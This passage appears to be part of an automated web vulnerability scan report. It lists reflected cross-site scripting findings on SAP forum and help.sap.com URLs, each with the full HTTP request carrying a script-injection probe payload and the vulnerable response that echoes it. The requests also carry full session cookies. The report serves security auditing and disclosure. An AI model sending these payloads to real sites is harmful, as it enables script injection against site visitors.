SDN_VISIT: QUMxMDY0MkQtMTMzOUU3NEREQjYtM0NFOTI5RUZCM0ZFOTg4
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
SDN_FORUM: 41
SDN_CATEGORY: 2
SDN_THREAD: 480818
SDN_MESSAGE: 3770439
Content-Length: 113302
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 19:43:39 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>
   <!-- SDN Forums generated page -->
       <title>SAP Community Network Forums: ESS Lea
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/style/style.jsp?threadID=480818&amp;cf17f"><a>fda93e2b7c0=1" />
...[SNIP]...

1.18. http://forums400.sdn.sap.com/thread.jspa [threadID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://forums400.sdn.sap.com
Path:   /thread.jspa

Issue detail

The value of the threadID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e11de</script><a>56173b93dc0 was submitted in the threadID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /thread.jspa?threadID=480818e11de</script><a>56173b93dc0 HTTP/1.1
Host: forums400.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://search400.sap.com/ui/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fstore%2fbobjamer%2fen_US%2fDisplayCategoryListPage%26categoryID%3d54721500; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MkQtMTMzOUU3NENCNkQtMjYyODRFQkZGMEU4Qjg0Rg==
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 8807
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 19:43:34 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>
   <!-- SDN Forums generated page -->
       <title>SAP Community Network Forums: Not Fou
...[SNIP]...
"
   s.prop5="glo"
   s.prop6="visitor"
   s.prop9="logN"
   if(typeof pnf != "undefined") {
       s.pageType=pnf;
       s.prop27=selfLocation.substring(0, selfLocation.indexOf('/', 8)) + "/thread.jspa?threadID=480818e11de</script><a>56173b93dc0";
   }
/* END CUSTOM CODING */
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
   var s_code=s.t()
   if(s_code)document.write(s_code)
} catch (e) {}
//-->
...[SNIP]...

1.19. http://help.sap.com/bestpractices [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.sap.com
Path:   /bestpractices

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c8c95<img%20src%3da%20onerror%3dalert(1)>1bc394f6d10 was submitted in the REST URL parameter 1. This input was echoed as c8c95<img src=a onerror=alert(1)>1bc394f6d10 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /bestpracticesc8c95<img%20src%3da%20onerror%3dalert(1)>1bc394f6d10 HTTP/1.1
Host: help.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://help.sap.com/boall/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; BIGipServersaphelp_old_help.sap.com=2674004140.20480.0000; shpuvid=172.16.92.241.1321213592635805; BIGipServersaphelp_prod_green=777785516.36895.0000; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww400.sdn.sap.com%2firj%2fscn%2fhelp-portal; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; mbox=check#true#1321213694|session#1321213478215-608827#1321215494; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Ahelp-portal%7C1321215469264%3B%20pe%3Dno%2520value%7C1321215469267%3B%20c3%3Dno%2520value%7C1321215469279%3B%20s_nr%3D1321213669286-Returning%7C1323805669286%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813669290%3B%20s_visit%3D1%7C1321215469292%3B%20gpv_p47%3Dno%2520value%7C1321215469295%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D9%3B%20s_sq%3Dsapsuite5%253D%252526pid%25253Dscn%2525253Aglo%2525253Ascn%2525253Ahelp-portal%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www400.sdn.sap.com/irj/scn/logon%2525253Fredirect%2525253D/irj/scn/help-portal%252526ot%25253DA%3B

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 19:51:57 GMT
Server: SAP LJS 1.0.0
X-Cascade: pass
Content-Type: text/html;charset=utf-8
Content-Length: 4037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if lt IE 7 ]> <html class="ie ie6" lang="en"> <![endif]-->
<!--[if IE 7 ]
...[SNIP]...
<a href='/bestpracticesc8c95&lt;img src=a onerror=alert(1)&gt;1bc394f6d10'>bestpracticesc8c95<img src=a onerror=alert(1)>1bc394f6d10</a>
...[SNIP]...

1.20. http://help.sap.com/boall/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.sap.com
Path:   /boall/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 52884<img%20src%3da%20onerror%3dalert(1)>a54b19296e9 was submitted in the REST URL parameter 1. This input was echoed as 52884<img src=a onerror=alert(1)>a54b19296e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /boall52884<img%20src%3da%20onerror%3dalert(1)>a54b19296e9/ HTTP/1.1
Host: help.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://help.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; BIGipServersaphelp_old_help.sap.com=2674004140.20480.0000; shpuvid=172.16.92.241.1321213592635805; BIGipServersaphelp_prod_green=777785516.36895.0000; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww400.sdn.sap.com%2firj%2fscn%2fhelp-portal; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; mbox=check#true#1321213694|session#1321213478215-608827#1321215494; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Ahelp-portal%7C1321215469264%3B%20pe%3Dno%2520value%7C1321215469267%3B%20c3%3Dno%2520value%7C1321215469279%3B%20s_nr%3D1321213669286-Returning%7C1323805669286%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813669290%3B%20s_visit%3D1%7C1321215469292%3B%20gpv_p47%3Dno%2520value%7C1321215469295%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D9%3B%20s_sq%3Dsapsuite5%253D%252526pid%25253Dscn%2525253Aglo%2525253Ascn%2525253Ahelp-portal%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www400.sdn.sap.com/irj/scn/logon%2525253Fredirect%2525253D/irj/scn/help-portal%252526ot%25253DA%3B

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 19:51:42 GMT
Server: SAP LJS 1.0.0
X-Cascade: pass
Content-Type: text/html;charset=utf-8
Content-Length: 3997

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if lt IE 7 ]> <html class="ie ie6" lang="en"> <![endif]-->
<!--[if IE 7 ]
...[SNIP]...
<a href='/boall52884&lt;img src=a onerror=alert(1)&gt;a54b19296e9'>boall52884<img src=a onerror=alert(1)>a54b19296e9</a>
...[SNIP]...

1.21. http://help.sap.com/fstatic/js/help.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.sap.com
Path:   /fstatic/js/help.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5a86f<script>alert(1)</script>f8176fc3412 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fstatic/js5a86f<script>alert(1)</script>f8176fc3412/help.js?1319720111 HTTP/1.1
Host: help.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://help.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; BIGipServersaphelp_old_help.sap.com=2674004140.20480.0000; shpuvid=172.16.92.241.1321213592635805; BIGipServersaphelp_prod_green=777785516.36895.0000; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww400.sdn.sap.com%2firj%2fscn%2fhelp-portal; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; mbox=check#true#1321213694|session#1321213478215-608827#1321215494; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Ahelp-portal%7C1321215433150%3B%20pe%3Dno%2520value%7C1321215433154%3B%20c3%3Dno%2520value%7C1321215433157%3B%20s_nr%3D1321213633168-Returning%7C1323805633168%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813633173%3B%20s_visit%3D1%7C1321215433175%3B%20gpv_p47%3Dno%2520value%7C1321215433180%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D9%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 19:51:11 GMT
Server: SAP LJS 1.0.0
X-Cascade: pass
Cache-Control: max-age=31536000, public
Expires: Fri, 26 Oct 2012 14:55:31 GMT
Content-Type: text/plain
Content-Length: 77

File not found: /fstatic/js5a86f<script>alert(1)</script>f8176fc3412/help.js

1.22. http://help.sap.com/fstatic/js/help.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.sap.com
Path:   /fstatic/js/help.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 30fa2<script>alert(1)</script>600e650462d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fstatic/js/help.js30fa2<script>alert(1)</script>600e650462d?1319720111 HTTP/1.1
Host: help.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://help.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; BIGipServersaphelp_old_help.sap.com=2674004140.20480.0000; shpuvid=172.16.92.241.1321213592635805; BIGipServersaphelp_prod_green=777785516.36895.0000; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww400.sdn.sap.com%2firj%2fscn%2fhelp-portal; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; mbox=check#true#1321213694|session#1321213478215-608827#1321215494; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Ahelp-portal%7C1321215433150%3B%20pe%3Dno%2520value%7C1321215433154%3B%20c3%3Dno%2520value%7C1321215433157%3B%20s_nr%3D1321213633168-Returning%7C1323805633168%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813633173%3B%20s_visit%3D1%7C1321215433175%3B%20gpv_p47%3Dno%2520value%7C1321215433180%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D9%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 19:51:14 GMT
Server: SAP LJS 1.0.0
X-Cascade: pass
Cache-Control: max-age=31536000, public
Expires: Fri, 26 Oct 2012 14:55:31 GMT
Content-Type: text/plain
Content-Length: 77

File not found: /fstatic/js/help.js30fa2<script>alert(1)</script>600e650462d

1.23. http://help.sap.com/fstatic/js/jquery-1.5.2.min.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.sap.com
Path:   /fstatic/js/jquery-1.5.2.min.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d46a3<script>alert(1)</script>ed1bab21ffe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fstatic/jsd46a3<script>alert(1)</script>ed1bab21ffe/jquery-1.5.2.min.js?1319720111 HTTP/1.1
Host: help.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://help.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; BIGipServersaphelp_old_help.sap.com=2674004140.20480.0000; shpuvid=172.16.92.241.1321213592635805; BIGipServersaphelp_prod_green=777785516.36895.0000; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww400.sdn.sap.com%2firj%2fscn%2fhelp-portal; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; mbox=check#true#1321213694|session#1321213478215-608827#1321215494; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Ahelp-portal%7C1321215433150%3B%20pe%3Dno%2520value%7C1321215433154%3B%20c3%3Dno%2520value%7C1321215433157%3B%20s_nr%3D1321213633168-Returning%7C1323805633168%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813633173%3B%20s_visit%3D1%7C1321215433175%3B%20gpv_p47%3Dno%2520value%7C1321215433180%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D9%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 19:51:23 GMT
Server: SAP LJS 1.0.0
X-Cascade: pass
Cache-Control: max-age=31536000, public
Expires: Fri, 26 Oct 2012 14:55:31 GMT
Content-Type: text/plain
Content-Length: 89

File not found: /fstatic/jsd46a3<script>alert(1)</script>ed1bab21ffe/jquery-1.5.2.min.js

1.24. http://help.sap.com/fstatic/js/jquery-1.5.2.min.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.sap.com
Path:   /fstatic/js/jquery-1.5.2.min.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dca84<script>alert(1)</script>708c6d8793 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fstatic/js/jquery-1.5.2.min.jsdca84<script>alert(1)</script>708c6d8793?1319720111 HTTP/1.1
Host: help.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://help.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; BIGipServersaphelp_old_help.sap.com=2674004140.20480.0000; shpuvid=172.16.92.241.1321213592635805; BIGipServersaphelp_prod_green=777785516.36895.0000; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww400.sdn.sap.com%2firj%2fscn%2fhelp-portal; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; mbox=check#true#1321213694|session#1321213478215-608827#1321215494; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Ahelp-portal%7C1321215433150%3B%20pe%3Dno%2520value%7C1321215433154%3B%20c3%3Dno%2520value%7C1321215433157%3B%20s_nr%3D1321213633168-Returning%7C1323805633168%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813633173%3B%20s_visit%3D1%7C1321215433175%3B%20gpv_p47%3Dno%2520value%7C1321215433180%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D9%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 19:51:25 GMT
Server: SAP LJS 1.0.0
X-Cascade: pass
Cache-Control: max-age=31536000, public
Expires: Fri, 26 Oct 2012 14:55:31 GMT
Content-Type: text/plain
Content-Length: 88

File not found: /fstatic/js/jquery-1.5.2.min.jsdca84<script>alert(1)</script>708c6d8793

1.25. http://help.sap.com/fstatic/staticimg/active.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.sap.com
Path:   /fstatic/staticimg/active.png

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 116cc<script>alert(1)</script>866c815398d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fstatic/staticimg116cc<script>alert(1)</script>866c815398d/active.png?1319720111 HTTP/1.1
Host: help.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://help.sap.com/boall/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
